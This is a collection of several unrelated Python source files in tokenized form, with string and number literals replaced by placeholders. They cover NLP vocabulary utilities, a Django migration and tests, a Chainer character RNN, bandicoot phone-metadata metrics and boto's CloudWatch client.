<EOL> int_ids = [ int ( i ) for i in ids ] <EOL> sentences . append ( int_ids ) <EOL> return sentences <EOL> def add_word_to_vocab ( word , words , vocab_map , vocab_size ) : <EOL> """<STR_LIT>""" <EOL> if word not in vocab_map : <EOL> words . append ( word ) <EOL> vocab_map [ word ] = vocab_size <EOL> vocab_size += <NUM_LIT:1> <EOL> return ( words , vocab_map , vocab_size ) <EOL> def to_id_int ( tokens , vocab_map , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> unk = VocabConstants . UNK <EOL> return [ int ( vocab_map [ token ] + offset ) if token in vocab_map else str ( vocab_map [ unk ] + offset ) for token in tokens ] <EOL> def to_id ( tokens , vocab_map , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> unk = VocabConstants . UNK <EOL> return [ str ( vocab_map [ token ] + offset ) if token in vocab_map else str ( vocab_map [ unk ] + offset ) for token in tokens ] <EOL> def to_text ( indices , words , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return [ words [ int ( index ) - offset ] for index in indices ] <EOL> def write_vocab ( out_file , words , freqs = [ ] ) : <EOL> """<STR_LIT>""" <EOL> f = codecs . open ( out_file , '<STR_LIT:w>' , '<STR_LIT:utf-8>' ) <EOL> vocab_size = <NUM_LIT:0> <EOL> for word in words : <EOL> if len ( freqs ) == <NUM_LIT:0> : <EOL> f . write ( '<STR_LIT>' % word ) <EOL> else : <EOL> f . write ( '<STR_LIT>' % ( word , freqs [ vocab_size ] ) ) <EOL> vocab_size += <NUM_LIT:1> <EOL> f . close ( ) <EOL> def load_vocab ( in_file ) : <EOL> """<STR_LIT>""" <EOL> sos = VocabConstants . SOS <EOL> eos = VocabConstants . EOS <EOL> unk = VocabConstants . UNK <EOL> vocab_inf = codecs . open ( in_file , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> words = [ ] <EOL> vocab_map = { } <EOL> vocab_size = <NUM_LIT:0> <EOL> for line in vocab_inf : <EOL> tokens = re . split ( '<STR_LIT>' , line . strip ( ) ) <EOL> word = tokens [ <NUM_LIT:0> ] <EOL> words . append ( word ) <EOL> vocab_map [ word ] = vocab_size <EOL> vocab_size += <NUM_LIT:1> <EOL> for word in [ sos , eos , unk ] : <EOL> ( words , vocab_map , vocab_size ) = add_word_to_vocab ( <EOL> word , words , vocab_map , vocab_size ) <EOL> vocab_inf . close ( ) <EOL> return ( vocab_map , vocab_size ) <EOL> def inverse_vocab ( vocab ) : <EOL> """<STR_LIT>""" <EOL> inv_vocab = { } <EOL> for k , v in vocab . iteritems ( ) : <EOL> inv_vocab [ v ] = k <EOL> return inv_vocab <EOL> def load_vocab_from_corpus ( in_file , freq , max_vocab_size ) : <EOL> """<STR_LIT>""" <EOL> f = codecs . open ( in_file , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> words = [ ] <EOL> vocab_map = { } <EOL> freq_map = { } <EOL> vocab_size = <NUM_LIT:0> <EOL> num_train_words = <NUM_LIT:0> <EOL> num_lines = <NUM_LIT:0> <EOL> for line in f : <EOL> tokens = re . split ( '<STR_LIT>' , line . strip ( ) ) <EOL> num_train_words += len ( tokens ) <EOL> for token in tokens : <EOL> if token not in vocab_map : <EOL> words . append ( token ) <EOL> vocab_map [ token ] = vocab_size <EOL> freq_map [ token ] = <NUM_LIT:0> <EOL> vocab_size += <NUM_LIT:1> <EOL> freq_map [ token ] += <NUM_LIT:1> <EOL> num_lines += <NUM_LIT:1> <EOL> if num_lines % <NUM_LIT> == <NUM_LIT:0> : <EOL> sys . stderr . write ( '<STR_LIT>' % num_lines ) <EOL> f . close ( ) <EOL> if freq > <NUM_LIT:0> or max_vocab_size > <NUM_LIT:0> : <EOL> ( words , vocab_map , freq_map , vocab_size ) = update_vocab ( <EOL> words , vocab_map , freq_map , freq , max_vocab_size ) <EOL> return ( words , vocab_map , freq_map , vocab_size , num_train_words , num_lines ) <EOL> def update_vocab ( words , vocab_map , freq_map , freq , max_vocab_size ) : <EOL> """<STR_LIT>""" <EOL> unk = VocabConstants . UNK <EOL> sos = VocabConstants . SOS <EOL> eos = VocabConstants . EOS <EOL> new_words = [ unk , sos , eos ] <EOL> new_vocab_map = { unk : VocabConstants . UNK_INDEX , sos : VocabConstants . SOS_INDEX , eos : VocabConstants . EOS_INDEX } <EOL> new_freq_map = { unk : <NUM_LIT:0> , sos : <NUM_LIT:0> , eos : <NUM_LIT:0> } <EOL> vocab_size = <NUM_LIT:3> <EOL> if freq > <NUM_LIT:0> : <EOL> for word in words : <EOL> if freq_map [ word ] < freq : <EOL> new_freq_map [ unk ] += freq_map [ word ] <EOL> else : <EOL> new_words . append ( word ) <EOL> new_vocab_map [ word ] = vocab_size <EOL> new_freq_map [ word ] = freq_map [ word ] <EOL> vocab_size += <NUM_LIT:1> <EOL> sys . stderr . write ( '<STR_LIT>' % ( <EOL> freq , unk , vocab_size , new_freq_map [ unk ] ) ) <EOL> else : <EOL> assert ( max_vocab_size > <NUM_LIT:0> ) <EOL> sorted_items = sorted ( <EOL> freq_map . items ( ) , key = lambda x : x [ <NUM_LIT:1> ] , reverse = True ) <EOL> for ( word , freq ) in sorted_items : <EOL> new_words . append ( word ) <EOL> new_vocab_map [ word ] = vocab_size <EOL> new_freq_map [ word ] = freq <EOL> vocab_size += <NUM_LIT:1> <EOL> if vocab_size == max_vocab_size : <EOL> break <EOL> return ( new_words , new_vocab_map , new_freq_map , vocab_size ) <EOL> def getOriginalIndeces ( indeces , offset ) : <EOL> orig = [ ] <EOL> for i in indeces : <EOL> orig . append ( i - offset ) <EOL> return orig <EOL> def getWordsFromIndeces ( indeces , vocab , offset ) : <EOL> words = [ ] <EOL> for i in indeces : <EOL> words . append ( vocab [ i - offset ] ) <EOL> return words </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT:path>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT:source>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT:error>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:error>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:path>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:error>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from datetime import datetime , timedelta <EOL> from django . test import TestCase <EOL> from . . models import Report , Fix <EOL> from . . settings import CONFIG <EOL> def create_fix ( ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> kwargs [ '<STR_LIT>' ] = Report . objects . create ( url = '<STR_LIT>' ) <EOL> return Fix . objects . create ( ** kwargs ) <EOL> class ReportTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> expiration_days = CONFIG [ '<STR_LIT>' ] <EOL> self . report1 = Report . objects . create ( url = '<STR_LIT>' ) <EOL> expired_datetime = datetime . now ( ) - timedelta ( days = expiration_days + <NUM_LIT:1> ) <EOL> self . report2 = Report . objects . create ( <EOL> url = '<STR_LIT>' , created_on = expired_datetime <EOL> ) <EOL> def test_expired ( self ) : <EOL> self . assertFalse ( self . report1 . expired ( ) ) <EOL> self . assertTrue ( self . report2 . expired ( ) ) <EOL> def test_delete_expired ( self ) : <EOL> Report . objects . delete_expired ( ) <EOL> qs = Report . objects . all ( ) <EOL> self . assertEqual ( qs . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( qs [ <NUM_LIT:0> ] . pk , <NUM_LIT:1> ) <EOL> class FixTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . fix = create_fix ( description = '<STR_LIT>' ) <EOL> def test_caches_description_html ( self ) : <EOL> self . assertEqual ( self . fix . description_html , '<STR_LIT>' ) <EOL> def test_updates_description_html ( self ) : <EOL> self . fix . description = '<STR_LIT>' <EOL> self . fix . save ( ) <EOL> self . assertEqual ( self . fix . description_html , '<STR_LIT>' ) </s>
<s> import numpy as np <EOL> from chainer import Variable , FunctionSet <EOL> import chainer . functions as F <EOL> import chainer . links as L <EOL> class CharRNN ( FunctionSet ) : <EOL> def __init__ ( self , n_vocab , n_units ) : <EOL> super ( CharRNN , self ) . __init__ ( <EOL> embed = F . EmbedID ( n_vocab , n_units ) , <EOL> l1_x = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l1_h = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l2_h = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l2_x = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l3 = L . Linear ( n_units , n_vocab ) , <EOL> ) <EOL> for param in self . parameters : <EOL> param [ : ] = np . random . uniform ( - <NUM_LIT> , <NUM_LIT> , param . shape ) <EOL> def forward_one_step ( self , x_data , y_data , state , train = True , dropout_ratio = <NUM_LIT:0.5> ) : <EOL> x = Variable ( x_data , volatile = not train ) <EOL> t = Variable ( y_data , volatile = not train ) <EOL> h0 = self . embed ( x ) <EOL> h1_in = self . l1_x ( F . dropout ( h0 , ratio = dropout_ratio , train = train ) ) + self . l1_h ( state [ '<STR_LIT>' ] ) <EOL> c1 , h1 = F . lstm ( state [ '<STR_LIT>' ] , h1_in ) <EOL> h2_in = self . l2_x ( F . dropout ( h1 , ratio = dropout_ratio , train = train ) ) + self . l2_h ( state [ '<STR_LIT>' ] ) <EOL> c2 , h2 = F . lstm ( state [ '<STR_LIT>' ] , h2_in ) <EOL> y = self . l3 ( F . dropout ( h2 , ratio = dropout_ratio , train = train ) ) <EOL> state = { '<STR_LIT>' : c1 , '<STR_LIT>' : h1 , '<STR_LIT>' : c2 , '<STR_LIT>' : h2 } <EOL> if train : <EOL> return state , F . softmax_cross_entropy ( y , t ) <EOL> else : <EOL> return state , F . softmax ( y ) <EOL> def make_initial_state ( n_units , batchsize = <NUM_LIT:50> , train = True ) : <EOL> return { name : Variable ( np . zeros ( ( batchsize , n_units ) , dtype = np . float32 ) , <EOL> volatile = not train ) <EOL> for name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } </s>
<s> from bandicoot . helper . tools import OrderedDict , warning_str <EOL> from bandicoot . helper . group import group_records , DATE_GROUPERS <EOL> import bandicoot as bc <EOL> from functools import partial <EOL> def flatten ( d , parent_key = '<STR_LIT>' , separator = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> for k , v in d . items ( ) : <EOL> new_key = parent_key + separator + k if parent_key else k <EOL> if isinstance ( v , dict ) : <EOL> items . extend ( flatten ( v , new_key , separator ) . items ( ) ) <EOL> else : <EOL> items . append ( ( new_key , v ) ) <EOL> return OrderedDict ( items ) <EOL> def all ( user , groupby = '<STR_LIT>' , summary = '<STR_LIT:default>' , network = False , split_week = False , split_day = False , attributes = True , flatten = False ) : <EOL> """<STR_LIT>""" <EOL> if groupby is not None : <EOL> if len ( set ( DATE_GROUPERS [ groupby ] ( r . datetime ) for r in user . records ) ) <= <NUM_LIT:1> : <EOL> print warning_str ( '<STR_LIT>' ) <EOL> scalar_type = '<STR_LIT>' if groupby == '<STR_LIT>' else '<STR_LIT>' <EOL> summary_type = '<STR_LIT>' if groupby == '<STR_LIT>' else '<STR_LIT>' <EOL> number_of_interactions_in = partial ( bc . individual . number_of_interactions , direction = '<STR_LIT>' ) <EOL> number_of_interactions_in . __name__ = '<STR_LIT>' <EOL> number_of_interactions_out = partial ( bc . individual . number_of_interactions , direction = '<STR_LIT>' ) <EOL> number_of_interactions_out . __name__ = '<STR_LIT>' <EOL> functions = [ <EOL> ( bc . individual . active_days , scalar_type ) , <EOL> ( bc . individual . number_of_contacts , scalar_type ) , <EOL> ( bc . individual . call_duration , summary_type ) , <EOL> ( bc . individual . percent_nocturnal , scalar_type ) , <EOL> ( bc . individual . percent_initiated_conversations , scalar_type ) , <EOL> ( bc . individual . percent_initiated_interactions , scalar_type ) , <EOL> ( bc . individual . response_delay_text , summary_type ) , <EOL> ( bc . individual . response_rate_text , scalar_type ) , <EOL> ( bc . individual . entropy_of_contacts , scalar_type ) , <EOL> ( bc . individual . balance_of_contacts , summary_type ) , <EOL> ( bc . individual . interactions_per_contact , summary_type ) , <EOL> ( bc . individual . interevent_time , summary_type ) , <EOL> ( bc . individual . percent_pareto_interactions , scalar_type ) , <EOL> ( bc . individual . percent_pareto_durations , scalar_type ) , <EOL> ( bc . individual . number_of_interactions , scalar_type ) , <EOL> ( number_of_interactions_in , scalar_type ) , <EOL> ( number_of_interactions_out , scalar_type ) , <EOL> ( bc . spatial . number_of_antennas , scalar_type ) , <EOL> ( bc . spatial . entropy_of_antennas , scalar_type ) , <EOL> ( bc . spatial . percent_at_home , scalar_type ) , <EOL> ( bc . spatial . radius_of_gyration , scalar_type ) , <EOL> ( bc . spatial . frequent_antennas , scalar_type ) , <EOL> ( bc . spatial . churn_rate , scalar_type ) <EOL> ] <EOL> network_functions = [ <EOL> bc . network . clustering_coefficient_unweighted , <EOL> bc . network . clustering_coefficient_weighted , <EOL> bc . network . assortativity_attributes , <EOL> bc . network . assortativity_indicators <EOL> ] <EOL> groups = [ [ r for r in g ] for g in group_records ( user , groupby = groupby ) ] <EOL> reporting = OrderedDict ( [ <EOL> ( '<STR_LIT>' , user . antennas_path ) , <EOL> ( '<STR_LIT>' , user . attributes_path ) , <EOL> ( '<STR_LIT:version>' , bc . __version__ ) , <EOL> ( '<STR_LIT>' , groupby ) , <EOL> ( '<STR_LIT>' , split_week ) , <EOL> ( '<STR_LIT>' , split_day ) , <EOL> ( '<STR_LIT>' , user . start_time and str ( user . start_time ) ) , <EOL> ( '<STR_LIT>' , user . end_time and str ( user . end_time ) ) , <EOL> ( '<STR_LIT>' , str ( user . night_start ) ) , <EOL> ( '<STR_LIT>' , str ( user . night_end ) ) , <EOL> ( '<STR_LIT>' , user . weekend ) , <EOL> ( '<STR_LIT>' , len ( groups ) ) , <EOL> ( '<STR_LIT>' , user . has_call ) , <EOL> ( '<STR_LIT>' , user . has_text ) , <EOL> ( '<STR_LIT>' , user . has_home ) , <EOL> ( '<STR_LIT>' , user . has_network ) , <EOL> ( '<STR_LIT>' , bc . helper . tools . percent_records_missing_location ( user ) ) , <EOL> ( '<STR_LIT>' , bc . helper . tools . antennas_missing_locations ( user ) ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_calls ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_texts ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_contacts ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_call_durations ) , <EOL> ] ) <EOL> if user . records is not None : <EOL> reporting [ '<STR_LIT>' ] = len ( user . records ) <EOL> else : <EOL> reporting [ '<STR_LIT>' ] = <NUM_LIT:0.> <EOL> if user . ignored_records is not None : <EOL> reporting [ '<STR_LIT>' ] = user . ignored_records <EOL> returned = OrderedDict ( [ <EOL> ( '<STR_LIT:name>' , user . name ) , <EOL> ( '<STR_LIT>' , reporting ) <EOL> ] ) <EOL> for fun , datatype in functions : <EOL> try : <EOL> metric = fun ( user , groupby = groupby , summary = summary , datatype = datatype , split_week = split_week , split_day = split_day ) <EOL> except ValueError : <EOL> metric = fun ( user , groupby = groupby , datatype = datatype , split_week = split_week , split_day = split_day ) <EOL> returned [ fun . __name__ ] = metric <EOL> if network and user . has_network : <EOL> for fun in network_functions : <EOL> returned [ fun . __name__ ] = fun ( user ) <EOL> if attributes and user . attributes != { } : <EOL> returned [ '<STR_LIT>' ] = user . attributes <EOL> if flatten is True : <EOL> return globals ( ) [ '<STR_LIT>' ] ( returned ) <EOL> return returned </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> from boto . connection import AWSQueryConnection <EOL> from boto . ec2 . cloudwatch . metric import Metric <EOL> from boto . ec2 . cloudwatch . alarm import MetricAlarm , MetricAlarms , AlarmHistoryItem <EOL> from boto . ec2 . cloudwatch . datapoint import Datapoint <EOL> from boto . regioninfo import RegionInfo <EOL> import boto <EOL> RegionData = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def regions ( ) : <EOL> """<STR_LIT>""" <EOL> regions = [ ] <EOL> for region_name in RegionData : <EOL> region = RegionInfo ( name = region_name , <EOL> endpoint = RegionData [ region_name ] , <EOL> connection_cls = CloudWatchConnection ) <EOL> regions . append ( region ) <EOL> return regions <EOL> def connect_to_region ( region_name , ** kw_params ) : <EOL> """<STR_LIT>""" <EOL> for region in regions ( ) : <EOL> if region . name == region_name : <EOL> return region . connect ( ** kw_params ) <EOL> return None <EOL> class CloudWatchConnection ( AWSQueryConnection ) : <EOL> APIVersion = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DefaultRegionName = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> DefaultRegionEndpoint = boto . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def __init__ ( self , aws_access_key_id = None , aws_secret_access_key = None , <EOL> is_secure = True , port = None , proxy = None , proxy_port = None , <EOL> proxy_user = None , proxy_pass = None , debug = <NUM_LIT:0> , <EOL> https_connection_factory = None , region = None , path = '<STR_LIT:/>' ) : <EOL> """<STR_LIT>""" <EOL> if not region : <EOL> region = RegionInfo ( self , self . DefaultRegionName , <EOL> self . DefaultRegionEndpoint ) <EOL> self . region = region <EOL> AWSQueryConnection . __init__ ( self , aws_access_key_id , <EOL> aws_secret_access_key , <EOL> is_secure , port , proxy , proxy_port , <EOL> proxy_user , proxy_pass , <EOL> self . region . endpoint , debug , <EOL> https_connection_factory , path ) <EOL> def _required_auth_capability ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> def build_dimension_param ( self , dimension , params ) : <EOL> for i , dim_name in enumerate ( dimension ) : <EOL> dim_value = dimension [ dim_name ] <EOL> if isinstance ( dim_value , basestring ) : <EOL> dim_value = [ dim_value ] <EOL> for j , value in enumerate ( dim_value ) : <EOL> params [ '<STR_LIT>' % ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) ] = dim_name <EOL> params [ '<STR_LIT>' % ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) ] = value <EOL> def build_list_params ( self , params , items , label ) : <EOL> if isinstance ( items , basestring ) : <EOL> items = [ items ] <EOL> for index , item in enumerate ( items ) : <EOL> i = index + <NUM_LIT:1> <EOL> if isinstance ( item , dict ) : <EOL> for k , v in item . iteritems ( ) : <EOL> params [ label % ( i , '<STR_LIT:Name>' ) ] = k <EOL> if v is not None : <EOL> params [ label % ( i , '<STR_LIT>' ) ] = v <EOL> else : <EOL> params [ label % i ] = item <EOL> def build_put_params ( self , params , name , value = None , timestamp = None , <EOL> unit = None , dimensions = None , statistics = None ) : <EOL> args = ( name , value , unit , dimensions , statistics ) <EOL> length = max ( map ( lambda a : len ( a ) if isinstance ( a , list ) else <NUM_LIT:1> , args ) ) <EOL> def aslist ( a ) : <EOL> if isinstance ( a , list ) : <EOL> if len ( a ) != length : <EOL> raise Exception ( '<STR_LIT>' % length ) <EOL> return a <EOL> return [ a ] * length <EOL> for index , ( n , v , u , d , s ) in enumerate ( zip ( * map ( aslist , args ) ) ) : <EOL> metric_data = { '<STR_LIT>' : n } <EOL> if timestamp : <EOL> metric_data [ '<STR_LIT>' ] = timestamp . isoformat ( ) <EOL> if unit : <EOL> metric_data [ '<STR_LIT>' ] = u <EOL> if dimensions : <EOL> self . build_dimension_param ( d , metric_data ) <EOL> if statistics : <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> if value != None : <EOL> msg = '<STR_LIT>' <EOL> msg += '<STR_LIT>' <EOL> boto . log . warn ( msg ) <EOL> elif value != None : <EOL> metric_data [ '<STR_LIT>' ] = v <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> for key , value in metric_data . iteritems ( ) : <EOL> params [ '<STR_LIT>' % ( index + <NUM_LIT:1> , key ) ] = value <EOL> def get_metric_statistics ( self , period , start_time , end_time , metric_name , <EOL> namespace , statistics , dimensions = None , <EOL> unit = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : period , <EOL> '<STR_LIT>' : metric_name , <EOL> '<STR_LIT>' : namespace , <EOL> '<STR_LIT>' : start_time . isoformat ( ) , <EOL> '<STR_LIT>' : end_time . isoformat ( ) } <EOL> self . build_list_params ( params , statistics , '<STR_LIT>' ) <EOL> if dimensions : <EOL> self . build_dimension_param ( dimensions , params ) <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , Datapoint ) ] ) <EOL> def list_metrics ( self , next_token = None , dimensions = None , <EOL> metric_name = None , namespace = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if next_token : <EOL> params [ '<STR_LIT>' ] = next_token <EOL> if dimensions : <EOL> self . build_dimension_param ( dimensions , params ) <EOL> if metric_name : <EOL> params [ '<STR_LIT>' ] = metric_name <EOL> if namespace : <EOL> params [ '<STR_LIT>' ] = namespace <EOL> return self . get_list ( '<STR_LIT>' , params , [ ( '<STR_LIT>' , Metric ) ] ) <EOL> def put_metric_data ( self , namespace , name , value = None , timestamp = None , <EOL> unit = None , dimensions = None , statistics = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : namespace } <EOL> self . build_put_params ( params , name , value = value , timestamp = timestamp , <EOL> unit = unit , dimensions = dimensions , statistics = statistics ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def describe_alarms ( self , action_prefix = None , alarm_name_prefix = None , <EOL> alarm_names = None , max_records = None , state_value = None , <EOL> next_token = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if action_prefix : <EOL> params [ '<STR_LIT>' ] = action_prefix <EOL> if alarm_name_prefix : <EOL> params [ '<STR_LIT>' ] = alarm_name_prefix <EOL> elif alarm_names : <EOL> self . build_list_params ( params , alarm_names , '<STR_LIT>' ) <EOL> if max_records : <EOL> params [ '<STR_LIT>' ] = max_records <EOL> if next_token : <EOL> params [ '<STR_LIT>' ] = next_token <EOL> if state_value : <EOL> params [ '<STR_LIT>' ] = state_value <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , MetricAlarms ) ] ) [ <NUM_LIT:0> ] <EOL> def describe_alarm_history ( self , alarm_name = None , <EOL> start_date = None , end_date = None , <EOL> max_records = None , history_item_type = None , <EOL> next_token = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if alarm_name : <EOL> params [ '<STR_LIT>' ] = alarm_name <EOL> if start_date : <EOL> params [ '<STR_LIT>' ] = start_date . isoformat ( ) <EOL> if end_date : <EOL> params [ '<STR_LIT>' ] = end_date . isoformat ( ) <EOL> if history_item_type : <EOL> params [ '<STR_LIT>' ] = history_item_type <EOL> if max_records : <EOL> params [ '<STR_LIT>' ] = max_records <EOL> if next_token : <EOL> params [ '<STR_LIT>' ] = next_token <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , AlarmHistoryItem ) ] ) <EOL> def describe_alarms_for_metric ( self , metric_name , namespace , period = None , <EOL> statistic = None , dimensions = None , unit = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : metric_name , <EOL> '<STR_LIT>' : namespace } <EOL> if period : <EOL> params [ '<STR_LIT>' ] = period <EOL> if statistic : <EOL> params [ '<STR_LIT>' ] = statistic <EOL> if dimensions : <EOL> self . build_dimension_param ( dimensions , params ) <EOL> if unit : <EOL> params [ '<STR_LIT>' ] = unit <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , MetricAlarm ) ] ) <EOL> def put_metric_alarm ( self , alarm ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT>' : alarm . name , <EOL> '<STR_LIT>' : alarm . metric , <EOL> '<STR_LIT>' : alarm . namespace , <EOL> '<STR_LIT>' : alarm . statistic , <EOL> '<STR_LIT>' : alarm . comparison , <EOL> '<STR_LIT>' : alarm . threshold , <EOL> '<STR_LIT>' : alarm . evaluation_periods , <EOL> '<STR_LIT>' : alarm . period , <EOL> } <EOL> if alarm . actions_enabled is not None : <EOL> params [ '<STR_LIT>' ] = alarm . actions_enabled <EOL> if alarm . alarm_actions : <EOL> self . build_list_params ( params , alarm . alarm_actions , <EOL> '<STR_LIT>' ) <EOL> if alarm . description : <EOL> params [ '<STR_LIT>' ] = alarm . description <EOL> if alarm . dimensions : <EOL> self . build_dimension_param ( alarm . dimensions , params ) <EOL> if alarm . insufficient_data_actions : <EOL> self . build_list_params ( params , alarm . insufficient_data_actions , <EOL> '<STR_LIT>' ) <EOL> if alarm . ok_actions : <EOL> self . build_list_params ( params , alarm . ok_actions , <EOL> '<STR_LIT>' ) <EOL> if alarm . unit : <EOL> params [ '<STR_LIT>' ] = alarm . unit <EOL> alarm . connection = self <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> create_alarm = put_metric_alarm <EOL> update_alarm = put_metric_alarm <EOL> def delete_alarms ( self , alarms ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> self . build_list_params ( params , alarms , '<STR_LIT>' ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def set_alarm_state ( self , alarm_name , state_reason , state_value , <EOL> state_reason_data = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : alarm_name , <EOL> '<STR_LIT>' : state_reason , <EOL> '<STR_LIT>' : state_value } <EOL> if state_reason_data : <EOL> params [ '<STR_LIT>' ] = json . dumps ( state_reason_data ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def enable_alarm_actions ( self , alarm_names ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> self . build_list_params ( params , alarm_names , '<STR_LIT>' ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def disable_alarm_actions ( self , alarm_names ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> self . build_list_params ( params , alarm_names , '<STR_LIT>' ) <EOL> return self . get_status ( '<STR_LIT>' , params ) </s>
